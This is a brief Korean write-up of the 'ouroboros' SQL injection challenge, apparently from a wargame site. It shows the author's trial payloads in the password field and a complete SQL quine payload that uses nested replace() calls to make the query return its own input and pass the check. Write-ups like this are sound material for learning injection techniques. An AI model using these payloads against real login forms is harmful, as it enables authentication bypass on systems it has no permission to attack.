ouroboros
Last updated
Last updated
첫 화면이다.
pw에 ' or length(pw)>0#
넣어봤지만 아무 결과도 나오지 않았다.
테이블을 비워둔 것으로 추측하였다.
pw에 ' union select 1#
을 넣어보니 아래와 같았다.
즉, 자기 자신의 소스코드를 출력하는 quine을 이용해 풀어야 하는 문제이다.
pw에 아래 문자열을 넣은 셈이다.
' union select replace(replace('" union select replace(replace("$",char(34),char(39)),char(36),"$") as "quine',char(34),char(39)),char(36),'" union select replace(replace("$",char(34),char(39)),char(36),"$") as "quine') as 'quine